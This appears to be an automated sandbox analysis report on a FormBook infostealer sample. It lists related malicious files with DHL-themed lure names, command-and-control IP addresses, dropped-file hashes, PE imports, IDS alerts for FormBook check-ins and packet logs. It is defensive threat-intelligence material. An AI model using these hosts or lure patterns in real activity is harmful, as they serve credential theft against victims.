                                                                                    CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    DONGFONG-TWDongFongTechnologyCoLtdTWrDHL8350232025-2.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    DHL 8350232025-1.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    DHL 745-12302024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    DHL 806-232024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    DHL 0737-12182024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    DHL 073412182024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                    • 101.0.232.112
                                                                                    mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                    • 119.15.228.125
                                                                                    DHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    SEDO-ASDErDHL8350232025-2.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    DHL 8350232025-1.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    DHL 745-12302024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    DHL 806-232024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    DHL 0737-12182024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    DHL 073412182024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    236236236.elfGet hashmaliciousUnknownBrowse
                                                                                    • 91.195.240.94
                                                                                    DHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94

                                                                                    JA3 Fingerprints

                                                                                    No context

                                                                                    Dropped Files

                                                                                    No context

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\Local\Temp\F56GKLK7U4

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\netbtugc.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                    Category:dropped
                                                                                    Size (bytes):196608
                                                                                    Entropy (8bit):1.121297215059106
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\resharpen

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\BP-50C26_20241220_082241.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):270848
                                                                                    Entropy (8bit):7.9931940421490335
                                                                                    Encrypted:true
                                                                                    SSDEEP:6144:lvOzc/5xhKTbizuB+6dDig3BhLFO5Km8sfS7eyl:hJ/5XgbxB+VgIKmyl
                                                                                    MD5:49193C89ADA3D93707577884A786CE92
                                                                                    SHA1:7902DA4FA75AB35C916384BC264103BC67992D2E
                                                                                    SHA-256:87404431E93F55CAB4889EF0D51F31AE7AF567EFB5B2AE1C1237A76EC25C27B3
                                                                                    SHA-512:ED97DB685ADB75F00C398CF322016A8D4755DD968310CB7AC5753F39297A2F0330317A935B57B34237E1373EEF44247C84ABF6E7AF16C8B8933E48274F446FFC
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:.n...3E0M...Q.....0N...p7]...E0MP5JX4UVO3E0MP5JX4UVO3E0MP5J.4UVA,.>M.<.y.T....X$#.:*[2$.^eS,>[%,.73oA0^m9[j.{.v"\!Uc]8@|4UVO3E04Q<.eT2.rS".p0R.B...uS".W...dT2.U...q0R..]6>rS".MP5JX4UV.vE0.Q4J.\..O3E0MP5J.4WWD2N0M@1JX4UVO3E0.E5JX$UVO.A0MPuJX$UVO1E0KP5JX4UVI3E0MP5JX.QVO1E0MP5JZ4..O3U0M@5JX4EVO#E0MP5JH4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5Jv@0.;3E0._1JX$UVO#A0M@5JX4UVO3E0MP5Jx4U6O3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UVO3E0MP5JX4UV

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Entropy (8bit):7.391043450519018
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:BP-50C26_20241220_082241.exe
                                                                                    File size:1'565'696 bytes
                                                                                    MD5:33d01c02e1bb141330aa8be95c21f1bf
                                                                                    SHA1:2dd0a42aa9c37455d21a1e0baa50c1055a606c89
                                                                                    SHA256:4f23853d15d1c7ddb80df75d6fa9d59a1b998c17f8585e785da245dfd2022be2
                                                                                    SHA512:10f4e18fcb1ffc109962f51fd19910cefd131065bc7c13adb0adb831793f46c151191b846597902a1433514d4316b8d4fd7a160bfbee176f22f32f442ff35012
                                                                                    SSDEEP:24576:sqDEvCTbMWu7rQYlBQcBiT6rprG8auKcpnz4E3ESB3oyEQwOCfHmVXw+YWWgokJ:sTvC/MTQYxsWR7auKcpnEWvB3RE9Glo
                                                                                    TLSH:F675E00273D1C062FF9B92334B5AF65147BC69260523E62F13A81DBABE701B1563E763
                                                                                    File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                                                                    File Icon

                                                                                    Icon Hash:aaf3e3e3938382a0

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x420577
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x677E636B [Wed Jan 8 11:37:15 2025 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:5
                                                                                    OS Version Minor:1
                                                                                    File Version Major:5
                                                                                    File Version Minor:1
                                                                                    Subsystem Version Major:5
                                                                                    Subsystem Version Minor:1
                                                                                    Import Hash:948cc502fe9226992dce9417f952fce3

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    call 00007FCB68E22F43h
                                                                                    jmp 00007FCB68E2284Fh
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    push dword ptr [ebp+08h]
                                                                                    mov esi, ecx
                                                                                    call 00007FCB68E22A2Dh
                                                                                    mov dword ptr [esi], 0049FDF0h
                                                                                    mov eax, esi
                                                                                    pop esi
                                                                                    pop ebp
                                                                                    retn 0004h
                                                                                    and dword ptr [ecx+04h], 00000000h
                                                                                    mov eax, ecx
                                                                                    and dword ptr [ecx+08h], 00000000h
                                                                                    mov dword ptr [ecx+04h], 0049FDF8h
                                                                                    mov dword ptr [ecx], 0049FDF0h
                                                                                    ret
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    push dword ptr [ebp+08h]
                                                                                    mov esi, ecx
                                                                                    call 00007FCB68E229FAh
                                                                                    mov dword ptr [esi], 0049FE0Ch
                                                                                    mov eax, esi
                                                                                    pop esi
                                                                                    pop ebp
                                                                                    retn 0004h
                                                                                    and dword ptr [ecx+04h], 00000000h
                                                                                    mov eax, ecx
                                                                                    and dword ptr [ecx+08h], 00000000h
                                                                                    mov dword ptr [ecx+04h], 0049FE14h
                                                                                    mov dword ptr [ecx], 0049FE0Ch
                                                                                    ret
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    mov esi, ecx
                                                                                    lea eax, dword ptr [esi+04h]
                                                                                    mov dword ptr [esi], 0049FDD0h
                                                                                    and dword ptr [eax], 00000000h
                                                                                    and dword ptr [eax+04h], 00000000h
                                                                                    push eax
                                                                                    mov eax, dword ptr [ebp+08h]
                                                                                    add eax, 04h
                                                                                    push eax
                                                                                    call 00007FCB68E255EDh
                                                                                    pop ecx
                                                                                    pop ecx
                                                                                    mov eax, esi
                                                                                    pop esi
                                                                                    pop ebp
                                                                                    retn 0004h
                                                                                    lea eax, dword ptr [ecx+04h]
                                                                                    mov dword ptr [ecx], 0049FDD0h
                                                                                    push eax
                                                                                    call 00007FCB68E25638h
                                                                                    pop ecx
                                                                                    ret
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    mov esi, ecx
                                                                                    lea eax, dword ptr [esi+04h]
                                                                                    mov dword ptr [esi], 0049FDD0h
                                                                                    push eax
                                                                                    call 00007FCB68E25621h
                                                                                    test byte ptr [ebp+08h], 00000001h
                                                                                    pop ecx

                                                                                    Rich Headers

                                                                                    Programming Language:
                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                    • [IMP] VS2008 SP1 build 30729

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000xa7974.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x17c0000x7594.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .rsrc0xd40000xa79740xa7a00d41e26382fd075670a4c90001f15c713False0.9609185659023117data7.95852775839398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0x17c0000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                    RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                    RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                    RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                    RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                    RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                    RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                    RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                    RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                    RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                    RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                    RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                                                                                    RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                    RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                                                                                    RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                    RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                    RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                    RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                    RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                    RT_RCDATA0xdc7b80x9ec3adata1.0003167778464643
                                                                                    RT_GROUP_ICON0x17b3f40x76dataEnglishGreat Britain0.6610169491525424
                                                                                    RT_GROUP_ICON0x17b46c0x14dataEnglishGreat Britain1.25
                                                                                    RT_GROUP_ICON0x17b4800x14dataEnglishGreat Britain1.15
                                                                                    RT_GROUP_ICON0x17b4940x14dataEnglishGreat Britain1.25
                                                                                    RT_VERSION0x17b4a80xdcdataEnglishGreat Britain0.6181818181818182
                                                                                    RT_MANIFEST0x17b5840x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                                    Imports

                                                                                    DLLImport
                                                                                    WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                                    VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                    MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                                    WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                                    PSAPI.DLLGetProcessMemoryInfo
                                                                                    IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                                    USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                                    UxTheme.dllIsThemeActive
                                                                                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                                                    USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                                                    GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                                    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                    ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                                    SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                    OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                                                                                    Possible Origin

                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    EnglishGreat Britain

                                                                                    Network Behavior

                                                                                    Suricata IDS Alerts

                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2025-01-08T14:59:27.901479+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549767154.215.72.11080TCP
                                                                                    2025-01-08T15:00:00.101207+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549967116.50.37.24480TCP
                                                                                    2025-01-08T15:01:21.693297+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54998485.159.66.9380TCP
                                                                                    2025-01-08T15:01:35.281359+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54998891.195.240.9480TCP
                                                                                    2025-01-08T15:01:56.879254+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54999266.29.149.4680TCP
                                                                                    2025-01-08T15:02:10.386888+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549996195.110.124.13380TCP
                                                                                    2025-01-08T15:02:40.141268+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550000217.196.55.20280TCP

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jan 8, 2025 14:59:26.998819113 CET4976780192.168.2.5154.215.72.110
                                                                                    Jan 8, 2025 14:59:27.003640890 CET8049767154.215.72.110192.168.2.5
                                                                                    Jan 8, 2025 14:59:27.003745079 CET4976780192.168.2.5154.215.72.110
                                                                                    Jan 8, 2025 14:59:27.006340981 CET4976780192.168.2.5154.215.72.110
                                                                                    Jan 8, 2025 14:59:27.011090040 CET8049767154.215.72.110192.168.2.5
                                                                                    Jan 8, 2025 14:59:27.901184082 CET8049767154.215.72.110192.168.2.5
                                                                                    Jan 8, 2025 14:59:27.901309013 CET8049767154.215.72.110192.168.2.5
                                                                                    Jan 8, 2025 14:59:27.901479006 CET4976780192.168.2.5154.215.72.110
                                                                                    Jan 8, 2025 14:59:27.912878036 CET4976780192.168.2.5154.215.72.110
                                                                                    Jan 8, 2025 14:59:27.917665005 CET8049767154.215.72.110192.168.2.5
                                                                                    Jan 8, 2025 14:59:51.420717955 CET4991980192.168.2.5116.50.37.244
                                                                                    Jan 8, 2025 14:59:51.425498009 CET8049919116.50.37.244192.168.2.5
